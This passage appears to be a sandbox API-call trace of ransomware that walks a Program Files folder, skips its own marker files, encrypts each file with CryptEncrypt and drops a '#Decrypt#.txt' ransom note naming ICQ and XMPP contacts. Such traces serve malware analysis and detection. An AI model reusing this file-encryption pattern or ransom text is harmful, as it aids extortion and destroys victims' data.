lpString2="Windows") returned -1 [0251.354] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\en-US") returned 36 [0251.354] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0251.354] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0251.354] lstrcmpW (lpString1="\\\\?\\C:\\Program 
Files\\DVD Maker\\en-US", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.354] GetProcessHeap () returned 0x780000 [0251.354] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0251.355] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\*") returned 38 [0251.355] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ead9a68, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xaa276ca7, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f05f082, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0251.355] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.355] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\.") returned 38 [0251.355] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.355] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ead9a68, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xaa276ca7, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f05f082, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0251.355] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.355] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\..") returned 39 [0251.355] lstrcmpW 
(lpString1="..", lpString2=".") returned 1 [0251.355] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.356] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11090870, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x11090870, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xca00, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="DVDMaker.exe.mui", cAlternateFileName="")) returned 1 [0251.356] lstrcmpiW (lpString1="DVDMaker.exe.mui", lpString2="Windows") returned -1 [0251.356] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\DVDMaker.exe.mui") returned 53 [0251.356] StrStrIW (lpFirst="DVDMaker.exe.mui", lpSrch=".horseleader") returned 0x0 [0251.356] lstrcmpW (lpString1="DVDMaker.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0251.356] lstrcmpW (lpString1="DVDMaker.exe.mui", lpString2="_uninstalling_.png") returned 1 [0251.356] lstrlenW (lpString=".testttjffg") returned 11 [0251.356] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\DVDMaker.exe.mui", lpSrch=".testttjffg") returned 0x0 [0251.356] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0251.356] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0251.356] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\DVDMaker.exe.mui" (normalized: "c:\\program files\\dvd maker\\en-us\\dvdmaker.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff 
[0251.356] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11090870, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x11090870, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="OmdProject.dll.mui", cAlternateFileName="")) returned 1 [0251.356] lstrcmpiW (lpString1="OmdProject.dll.mui", lpString2="Windows") returned -1 [0251.357] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\OmdProject.dll.mui") returned 55 [0251.357] StrStrIW (lpFirst="OmdProject.dll.mui", lpSrch=".horseleader") returned 0x0 [0251.357] lstrcmpW (lpString1="OmdProject.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0251.357] lstrcmpW (lpString1="OmdProject.dll.mui", lpString2="_uninstalling_.png") returned 1 [0251.357] lstrlenW (lpString=".testttjffg") returned 11 [0251.357] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\OmdProject.dll.mui", lpSrch=".testttjffg") returned 0x0 [0251.357] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0251.357] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0251.357] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\OmdProject.dll.mui" (normalized: "c:\\program files\\dvd maker\\en-us\\omdproject.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.359] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: 
lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11090870, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x11090870, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="WMM2CLIP.dll.mui", cAlternateFileName="")) returned 1 [0251.359] lstrcmpiW (lpString1="WMM2CLIP.dll.mui", lpString2="Windows") returned 1 [0251.359] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\WMM2CLIP.dll.mui") returned 53 [0251.359] StrStrIW (lpFirst="WMM2CLIP.dll.mui", lpSrch=".horseleader") returned 0x0 [0251.359] lstrcmpW (lpString1="WMM2CLIP.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0251.359] lstrcmpW (lpString1="WMM2CLIP.dll.mui", lpString2="_uninstalling_.png") returned 1 [0251.359] lstrlenW (lpString=".testttjffg") returned 11 [0251.359] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\WMM2CLIP.dll.mui", lpSrch=".testttjffg") returned 0x0 [0251.359] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0251.359] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0251.359] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\WMM2CLIP.dll.mui" (normalized: "c:\\program files\\dvd maker\\en-us\\wmm2clip.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.360] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11090870, 
ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x11090870, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="WMM2CLIP.dll.mui", cAlternateFileName="")) returned 0 [0251.360] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0251.360] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\#Decrypt#.txt") returned 50 [0251.360] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\#Decrypt#.txt" (normalized: "c:\\program files\\dvd maker\\en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0251.361] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0251.361] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0251.362] lstrlenA (lpString="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") returned 1368 [0251.362] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0251.363] CloseHandle (hObject=0x1cc) returned 1 [0251.363] GetProcessHeap () returned 0x780000 [0251.363] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0251.363] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd559b52d, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0xd559b52d, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x499cc441, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xddb8, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="Eurosti.TTF", cAlternateFileName="")) returned 1 [0251.363] lstrcmpiW (lpString1="Eurosti.TTF", lpString2="Windows") returned -1 [0251.363] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Eurosti.TTF") returned 42 [0251.363] StrStrIW (lpFirst="Eurosti.TTF", lpSrch=".horseleader") returned 0x0 [0251.363] lstrcmpW (lpString1="Eurosti.TTF", lpString2="#Decrypt#.txt") returned 1 [0251.363] lstrcmpW (lpString1="Eurosti.TTF", lpString2="_uninstalling_.png") returned 1 [0251.363] lstrlenW (lpString=".testttjffg") returned 11 [0251.363] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Eurosti.TTF", lpSrch=".testttjffg") 
returned 0x0 [0251.363] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0251.363] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0251.363] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Eurosti.TTF" (normalized: "c:\\program files\\dvd maker\\eurosti.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.364] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0c03b3f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0c03b3f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0c03b3f, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa200, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="fieldswitch.ax", cAlternateFileName="")) returned 1 [0251.364] lstrcmpiW (lpString1="fieldswitch.ax", lpString2="Windows") returned -1 [0251.364] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\fieldswitch.ax") returned 45 [0251.364] StrStrIW (lpFirst="fieldswitch.ax", lpSrch=".horseleader") returned 0x0 [0251.364] lstrcmpW (lpString1="fieldswitch.ax", lpString2="#Decrypt#.txt") returned 1 [0251.364] lstrcmpW (lpString1="fieldswitch.ax", lpString2="_uninstalling_.png") returned 1 [0251.364] lstrlenW (lpString=".testttjffg") returned 11 [0251.364] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\fieldswitch.ax", lpSrch=".testttjffg") returned 0x0 [0251.364] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0251.364] CryptEncrypt (in: 
hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0251.364] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\fieldswitch.ax" (normalized: "c:\\program files\\dvd maker\\fieldswitch.ax"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.365] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0bdd9df, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0bdd9df, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0c03b3f, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa800, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="offset.ax", cAlternateFileName="")) returned 1 [0251.365] lstrcmpiW (lpString1="offset.ax", lpString2="Windows") returned -1 [0251.365] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\offset.ax") returned 40 [0251.365] StrStrIW (lpFirst="offset.ax", lpSrch=".horseleader") returned 0x0 [0251.365] lstrcmpW (lpString1="offset.ax", lpString2="#Decrypt#.txt") returned 1 [0251.365] lstrcmpW (lpString1="offset.ax", lpString2="_uninstalling_.png") returned 1 [0251.365] lstrlenW (lpString=".testttjffg") returned 11 [0251.365] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\offset.ax", lpSrch=".testttjffg") returned 0x0 [0251.365] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0251.365] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0251.366] 
CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\offset.ax" (normalized: "c:\\program files\\dvd maker\\offset.ax"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.366] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0c03b3f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0c03b3f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0eb1404, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xe46400, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="OmdBase.dll", cAlternateFileName="")) returned 1 [0251.366] lstrcmpiW (lpString1="OmdBase.dll", lpString2="Windows") returned -1 [0251.366] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\OmdBase.dll") returned 42 [0251.366] StrStrIW (lpFirst="OmdBase.dll", lpSrch=".horseleader") returned 0x0 [0251.366] lstrcmpW (lpString1="OmdBase.dll", lpString2="#Decrypt#.txt") returned 1 [0251.366] lstrcmpW (lpString1="OmdBase.dll", lpString2="_uninstalling_.png") returned 1 [0251.366] lstrlenW (lpString=".testttjffg") returned 11 [0251.366] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\OmdBase.dll", lpSrch=".testttjffg") returned 0x0 [0251.366] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0251.366] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0251.366] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\OmdBase.dll" (normalized: "c:\\program files\\dvd maker\\omdbase.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.367] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0efd6c5, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0efd6c5, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb102e1c7, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x432600, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="OmdProject.dll", cAlternateFileName="")) returned 1 [0251.367] lstrcmpiW (lpString1="OmdProject.dll", lpString2="Windows") returned -1 [0251.368] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\OmdProject.dll") returned 45 [0251.368] StrStrIW (lpFirst="OmdProject.dll", lpSrch=".horseleader") returned 0x0 [0251.368] lstrcmpW (lpString1="OmdProject.dll", lpString2="#Decrypt#.txt") returned 1 [0251.368] lstrcmpW (lpString1="OmdProject.dll", lpString2="_uninstalling_.png") returned 1 [0251.368] lstrlenW (lpString=".testttjffg") returned 11 [0251.368] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\OmdProject.dll", lpSrch=".testttjffg") returned 0x0 [0251.368] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0251.368] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0251.368] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\OmdProject.dll" (normalized: "c:\\program files\\dvd maker\\omdproject.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.368] FindNextFileW (in: 
hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0b6b5be, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0b6b5be, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0bb787f, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1c4600, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="Pipeline.dll", cAlternateFileName="")) returned 1 [0251.368] lstrcmpiW (lpString1="Pipeline.dll", lpString2="Windows") returned -1 [0251.368] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Pipeline.dll") returned 43 [0251.368] StrStrIW (lpFirst="Pipeline.dll", lpSrch=".horseleader") returned 0x0 [0251.369] lstrcmpW (lpString1="Pipeline.dll", lpString2="#Decrypt#.txt") returned 1 [0251.369] lstrcmpW (lpString1="Pipeline.dll", lpString2="_uninstalling_.png") returned 1 [0251.369] lstrlenW (lpString=".testttjffg") returned 11 [0251.369] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Pipeline.dll", lpSrch=".testttjffg") returned 0x0 [0251.369] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0251.369] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0251.369] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Pipeline.dll" (normalized: "c:\\program files\\dvd maker\\pipeline.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.369] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7b5c53e, 
ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0xc7b5c53e, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x43aceae0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x1cc000, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="PipeTran.dll", cAlternateFileName="")) returned 1 [0251.369] lstrcmpiW (lpString1="PipeTran.dll", lpString2="Windows") returned -1 [0251.369] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\PipeTran.dll") returned 43 [0251.369] StrStrIW (lpFirst="PipeTran.dll", lpSrch=".horseleader") returned 0x0 [0251.369] lstrcmpW (lpString1="PipeTran.dll", lpString2="#Decrypt#.txt") returned 1 [0251.370] lstrcmpW (lpString1="PipeTran.dll", lpString2="_uninstalling_.png") returned 1 [0251.370] lstrlenW (lpString=".testttjffg") returned 11 [0251.370] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\PipeTran.dll", lpSrch=".testttjffg") returned 0x0 [0251.370] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0251.370] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0251.370] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\PipeTran.dll" (normalized: "c:\\program files\\dvd maker\\pipetran.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.370] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0eb1404, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0eb1404, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0eb1404, 
